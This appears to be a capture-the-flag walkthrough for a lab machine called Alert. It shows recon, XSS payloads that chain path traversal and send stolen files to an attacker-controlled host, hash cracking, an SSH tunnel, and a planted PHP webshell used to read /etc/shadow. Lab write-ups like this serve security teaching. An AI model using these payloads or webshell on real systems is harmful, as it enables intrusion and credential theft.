Explore the fundamentals of cybersecurity in the Alert Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
1
| 10.10.11.44 alert.htb statistics.alert.htb
|
Script to add hosts automatically
1
2
3
| ip="10.10.11.44"
domain="alert.htb statistics.alert.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
|
Mapping
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
Subdomain
1
| ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fw 20
|
1
| statistics [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 54ms]
|
WebServer:
Markdown xss:
1
2
3
4
5
6
7
8
| <script>
fetch("http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>
|
Url decode the response
This shows /var/www/statistics.alert.htb/.htpasswd so
1
2
3
4
5
6
7
8
| <script>
fetch("http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>
|
Url decode the response
Brute Force the Hash
1
2
3
4
5
| echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1600 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt
|
This yields manchesterunited
1
| ssh -L 8080:127.0.0.1:8080 albert@alert.htb
|
1
2
3
| cat user.txt
cd /opt/website-monitor/config
echo '<?php system($_GET['cmd']);?>' > webshell.php
|
in your machine:
1
| curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/root/root.txt'
|
1
| curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/etc/shadow'
|
$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/